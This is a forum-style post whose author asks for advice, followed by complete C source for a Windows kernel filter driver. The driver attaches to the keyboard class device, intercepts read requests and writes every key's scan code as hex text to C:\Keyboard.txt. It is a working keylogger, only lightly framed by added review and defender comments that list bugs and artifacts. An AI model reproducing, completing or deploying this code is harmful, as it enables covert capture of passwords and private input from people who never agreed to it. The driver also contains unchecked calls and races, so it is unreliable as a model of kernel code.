该程序是把按键的扫描码记录下来,并写入C盘根目录下的文本文件里面!!希望有人可以指点指点小菜!
#include <ntddk.h>
#include <ntddkbd.h>
// Driver-wide state shared by the dispatch routine, the completion routine,
// the worker thread and the unload routine.
// NOTE(review): num and data are plain ULONGs changed with ordinary ++/--/=
// from several routines; no lock or interlocked operation is visible.
typedef BOOLEAN BOOL;
PETHREAD aThread; // thread object of the file-writing worker thread
// Original comment calls this the filter device object; in Attach it receives
// IoAttachDevice's AttachedDevice output, and ReadFunc forwards IRPs to it.
PDEVICE_OBJECT aDevice;
BOOL Ter = FALSE; // set to TRUE by Unload to ask the worker thread to exit
ULONG num = 0; // counter: incremented in ReadFunc, decremented in ReadCom
HANDLE hFile; // handle of the output file opened in DriverEntry
ULONG data; // keyboard data: the MakeCode last stored by ReadCom
KSEMAPHORE sem; // semaphore released by ReadCom/Unload, waited on by ThreadFunc
// Creates an unnamed FILE_DEVICE_KEYBOARD device object for this driver and
// attaches it to the device stack of \Device\KeyboardClass0.
//   dri     - this driver's DRIVER_OBJECT, owner of the new device object.
//   returns - the NTSTATUS of IoAttachDevice.
// On success aDevice holds the device object IoAttachDevice reports as the
// one attached to; ReadFunc forwards IRPs to it.
// Defender note: a device object layered above a keyboard class device has
// that stack's read IRPs routed through it (see ReadFunc/ReadCom), so an
// unexpected driver in the keyboard device stack is worth reviewing.
NTSTATUS Attach(PDRIVER_OBJECT dri)
{
UNICODE_STRING str;
NTSTATUS status;
PDEVICE_OBJECT dev;
RtlInitUnicodeString(&str, L"\\Device\\KeyboardClass0");
status = IoCreateDevice(dri,
0,
0,
FILE_DEVICE_KEYBOARD,
0,
0,
&dev);
// NOTE(review): the IoCreateDevice status is overwritten below without being
// checked, so dev (uninitialized on failure) is dereferenced unconditionally.
dev->Flags = dev->Flags | (DO_BUFFERED_IO | DO_POWER_PAGABLE);
dev->Flags = dev->Flags &~ DO_DEVICE_INITIALIZING;
status = IoAttachDevice(dev, &str, &aDevice);
// NOTE(review): when IoAttachDevice fails, dev is not deleted here.
return status;
}
// Worker thread routine: every time sem is signalled, formats the global
// `data` as hexadecimal text and writes it, followed by one space, to hFile.
//   pContext - thread start context; not used.
// The thread exits through PsTerminateSystemThread once Ter is TRUE.
// Security note: the scan codes end up as plain text in the file opened by
// DriverEntry and are also echoed through DbgPrint, so the captured input is
// readable by anything that can read that file or the debug output.
void ThreadFunc(PVOID pContext)
{
IO_STATUS_BLOCK ioStatus;
UNICODE_STRING unicode;
ANSI_STRING ansi;
CHAR ch = ' ';
while(TRUE)
{
KeWaitForSingleObject(&sem, Executive, KernelMode, FALSE, NULL);
DbgPrint("waitting is ing!");
// Unload sets Ter and releases sem once more to wake the thread for exit.
if(Ter == TRUE)
{
PsTerminateSystemThread(STATUS_SUCCESS);
}
// 8 bytes of paged pool = room for four WCHARs.
// NOTE(review): the allocation result is not checked before use, and
// unicode.Length is left uninitialized before the conversion call.
unicode.Buffer = (PWSTR)ExAllocatePool(PagedPool, 8);
unicode.MaximumLength = 8;
// data is a single global slot, so this reads whatever the most recent
// completion in ReadCom stored, not necessarily one value per wake-up.
RtlIntegerToUnicodeString(data, 16, &unicode);
DbgPrint("转换后的为:%wZ\n", &unicode);
// TRUE asks the routine to allocate ansi.Buffer; released by RtlFreeAnsiString.
// NOTE(review): the return values of both conversions and of both writes are
// ignored; if the ANSI conversion fails, ansi is used and freed uninitialized.
RtlUnicodeStringToAnsiString(&ansi, &unicode, TRUE);
DbgPrint("ANSi 字符串为:%Z\n", &ansi);
ZwWriteFile(hFile,
0,
0,
0,
&ioStatus,
ansi.Buffer,
ansi.Length,
0,
0);
// Single-space separator after each value.
ZwWriteFile(hFile,
0,
0,
0,
&ioStatus,
&ch,
1,
0,
0);
RtlFreeAnsiString(&ansi);
// NOTE(review): this buffer came from ExAllocatePool, not from an Rtl
// conversion routine — confirm RtlFreeUnicodeString is the matching release.
RtlFreeUnicodeString(&unicode);
}
// Not reached: the loop above has no break.
return;
}
// Starts the system thread that runs ThreadFunc and stores a referenced
// pointer to its thread object in aThread (Unload waits on it).
//   dri     - unused.
//   returns - the NTSTATUS of PsCreateSystemThread.
NTSTATUS InitThread(PDRIVER_OBJECT dri)
{
NTSTATUS status;
HANDLE Thread;
UNREFERENCED_PARAMETER(dri);
status = PsCreateSystemThread(&Thread,
0,
0,
0,
0,
ThreadFunc,
0);
// NOTE(review): status is not checked, so on failure Thread is used
// uninitialized below; the ObReferenceObjectByHandle result is ignored too.
// No matching ObDereferenceObject on aThread appears in the visible code.
ObReferenceObjectByHandle(Thread, THREAD_ALL_ACCESS, NULL, KernelMode,
(PVOID*)&aThread, NULL);
// The handle is no longer needed once the object reference is held.
ZwClose(Thread);
return status;
}
// Completion routine installed by ReadFunc on forwarded read IRPs.
// When the read succeeded it treats the system buffer as a
// KEYBOARD_INPUT_DATA record, copies its MakeCode into the global `data`
// and releases sem once so the worker thread runs.
//   dev     - unused.
//   irp     - the completed read IRP.
//   Context - unused (ReadFunc passes its device object here).
//   returns - the IRP's completion status.
NTSTATUS ReadCom(PDEVICE_OBJECT dev, PIRP irp, PVOID Context)
{
PUCHAR buf;
PKEYBOARD_INPUT_DATA KeyData;
if(irp->IoStatus.Status == STATUS_SUCCESS)
{
// NOTE(review): IoStatus.Information is not consulted, so the buffer is read
// as one full record without confirming that many bytes were returned.
buf = irp->AssociatedIrp.SystemBuffer;
KeyData = (PKEYBOARD_INPUT_DATA)buf;
data = KeyData->MakeCode;
DbgPrint("ScanCode:%x", data);
KeReleaseSemaphore(&sem, 0, 1, FALSE);
}
// Propagate the pending state up the stack.
if(irp->PendingReturned)
{
IoMarkIrpPending(irp);
}
// Balances the num++ in ReadFunc; Unload polls num until it reaches zero.
// NOTE(review): plain decrement, no interlocked operation; this routine is
// also still executing after the decrement when Unload may observe zero.
num--;
return irp->IoStatus.Status;
}
// IRP_MJ_READ dispatch routine: passes the read down to aDevice and arranges
// for ReadCom to run when it completes (on success, error and cancel).
//   dev     - this driver's device object; handed to ReadCom as context.
//   irp     - the read IRP.
//   returns - the NTSTATUS of IoCallDriver.
NTSTATUS ReadFunc(PDEVICE_OBJECT dev, PIRP irp)
{
IoCopyCurrentIrpStackLocationToNext(irp);
IoSetCompletionRoutine(irp,
ReadCom,
dev,
TRUE,
TRUE,
TRUE);
// Counts reads that have been forwarded but not yet completed.
// NOTE(review): plain increment on a global that ReadCom decrements.
num++;
return IoCallDriver(aDevice, irp);
}
// DriverUnload routine: detaches from the keyboard stack, waits for
// outstanding reads to complete, stops the worker thread, then deletes the
// device object and closes the output file.
//   dri - this driver's DRIVER_OBJECT.
void Unload(PDRIVER_OBJECT dri)
{
// Negative value = relative interval in 100 ns units, i.e. 1 ms per poll.
LARGE_INTEGER timeout = RtlConvertLongToLargeInteger(-10*1000);
IoDetachDevice(aDevice);
// Poll until every forwarded read has passed through ReadCom.
// NOTE(review): this loop has no upper bound; it blocks for as long as a
// forwarded read stays outstanding.
while(num)
{
KeDelayExecutionThread(KernelMode, FALSE, &timeout);
}
// Ask the worker thread to exit and wake it so it sees the flag.
Ter = TRUE;
KeReleaseSemaphore(&sem, 0, 1, FALSE);
KeWaitForSingleObject(aThread, Executive, KernelMode, FALSE, NULL);
// NOTE(review): the aThread reference taken in InitThread is not released here.
IoDeleteDevice(dri->DeviceObject);
ZwClose(hFile);
return ;
}
// Driver entry point: registers the read dispatch and unload routines,
// initializes the semaphore, opens the output file, attaches to the keyboard
// stack and starts the worker thread.
//   dri     - this driver's DRIVER_OBJECT.
//   str     - second DriverEntry argument; unused.
//   returns - the NTSTATUS of Attach.
// Defender note: the artifacts visible in this listing are the output path
// \??\C:\Keyboard.txt, the attachment to \Device\KeyboardClass0 and the
// DbgPrint strings; the file receives scan codes as unencrypted hex text.
NTSTATUS DriverEntry(PDRIVER_OBJECT dri, PUNICODE_STRING str)
{
NTSTATUS status;
UNICODE_STRING FileName;
OBJECT_ATTRIBUTES objectAttributes;
IO_STATUS_BLOCK iostatus;
UNREFERENCED_PARAMETER(str);
// NOTE(review): only IRP_MJ_READ is assigned here; no other MajorFunction
// entry is set in the visible code.
dri->MajorFunction[IRP_MJ_READ] = ReadFunc;
dri->DriverUnload = Unload;
// Initial count 0, so the worker thread blocks until ReadCom releases sem.
KeInitializeSemaphore(&sem, 0, MAXLONG);
RtlInitUnicodeString(&FileName, L"\\??\\C:\\Keyboard.txt");
// NOTE(review): OBJ_KERNEL_HANDLE is not set and the security descriptor is
// NULL, so the handle and the file get default protection — confirm intent.
InitializeObjectAttributes(&objectAttributes,
&FileName,
OBJ_CASE_INSENSITIVE,
NULL,
NULL);
// FILE_OVERWRITE_IF: an existing file is overwritten, otherwise it is created.
// NOTE(review): the ZwCreateFile status is ignored; hFile is used later
// whether or not the open succeeded.
ZwCreateFile(&hFile,
GENERIC_WRITE,
&objectAttributes,
&iostatus,
NULL,
FILE_ATTRIBUTE_NORMAL,
0,
FILE_OVERWRITE_IF,
FILE_SYNCHRONOUS_IO_NONALERT,
0,
0);
status = Attach(dri);
// NOTE(review): the thread is started even when Attach failed, and its own
// status is dropped; on an Attach failure DriverEntry returns an error while
// the thread and the file handle are left behind.
InitThread(dri);
return status;
}